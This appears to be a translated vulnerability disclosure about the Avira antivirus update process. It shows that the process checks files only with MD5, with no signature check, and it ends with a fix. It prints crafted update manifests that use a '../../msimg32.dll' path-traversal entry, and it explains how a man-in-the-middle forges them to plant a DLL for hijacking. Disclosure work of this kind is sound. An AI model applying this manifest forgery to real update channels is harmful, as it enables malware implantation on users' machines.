Avira's anti-virus software upgrade process has defects (which can be exploited by man-in-the-middle attacks to implant Trojans)

Avira's anti-virus software upgrade process has defects (which can be exploited by man-in-the-middle attacks to implant Trojans)

The latest version (14.0.7.468) of Avira anti-virus software can be exploited by man-in-the-middle during the upgrade process. This allows machines with updated programs to be implanted with arbitrary EXE files.

The upgrade process of little red umbrella is complicated. It can be roughly divided into two steps for indexing and two steps for description. The required module files will be downloaded. Although each step of the description file or index file has been verified, however, the verification is too simple. It only uses MD5 to verify the file, and the final file does not undergo digital signature verification. As a result, attackers can take advantage of this vulnerability. The following test steps are provided for free Chinese Personal Edition, the paid version is not tested. The details are as follows:



1. Slave URL: slave:

CRDATE=20140206_0032<e0d1ebd2939e73f0bcf0c319c9aa654e>

2. Slave URL: slave:

CRDATE=20141215_1006PRODUCTINFO=/idx/wks_avira-win32-zhcn-pecl.info.gzUPDATEROOT=/PRODUCTINFOHASH=wks_avira-win32-zhcn-pecl.info,c14bb3445405d488c915690e9e68150f<bbd837127dd33aeead37fdc1cf514bd8>

3. Slave URL: slave:

<?xml version="1.0" encoding="iso-8859-1"?><!-- generated with updatecompiler 1.2.0.39 --><UPDATE><VERSION value="11.0.0.1"/><NAME value="AntiVir OEM"/><DATE value="Thu Dec 15 10:06:29 2011"/><MODULE NAME="VDF"><DESTINATION value="%INSTALL_DIR%\;OS=ALL"/><SOURCE value="./"/><INCLUDE value="vdf.upd"/><ENGINE_VDF_SET value=""/></MODULE><MODULE NAME="MAIN"><DESTINATION value="%INSTALL_DIR%\;OS=ALL"/><SOURCE value="./"/><Group value="product"/><FILE><NAME value="../../msimg32.dll"/><FILEMD5 value="2b5faad18db50b36c53026603a2a4680"/><PEFILEMD5 value="2b5faad18db50b36c53026603a2a4680"/><FILESIZE value="359461"/><ZIPMD5 value="aeafe1199958520d797ad4dc8d884a69"/><ZIPSIZE value="154842"/><OS value="ALL"/></FILE></MODULE><MD5 value="c482fc0a8dfb3792c791b14aaf81c944"/></UPDATE>

It should be particularly noted that if the man-in-the-middle wants to attack the target, it is most appropriate to forge this file because it describes the hash and size of the file to be upgraded, in this step, you can construct a relative path to put the final downloaded file in the appropriate path. In addition, the file must be compressed and transmitted using gzip.



4. Slave URL: slave:

<?xml version="1.0" encoding="iso-8859-1"?><!-- generated with updatecompiler 1.2.0.39 --><UPDATE><VERSION value="0.0.0.1"/><NAME value="AntiVir OEM"/><DATE value="Fri Apr 23 20:20:48 2010"/><MODULE NAME="VDF"><DESTINATION value="%INSTALL_DIR%\;OS=ALL"/><SOURCE value="./"/><VdfDate value="20100423_0000"/></MODULE><MD5 value="375a49d59ed59808277c1d7a5cf07801"/></UPDATE>

5. Download the final module File Based on the path of the MAIN module described in the file downloaded in step 1. The URL is similar to: modules.



The above upgrade steps show the same effect as manual upgrade (6 hours by default ).

The attacker is upgraded before the attack:
 

Upgrade after attack:
 

About five minutes after the attack, a component in the background was started to implement DLL hijacking and injection ,:
 

 

Solution:

The encryption upgrade process verifies the digital signature of the downloaded file.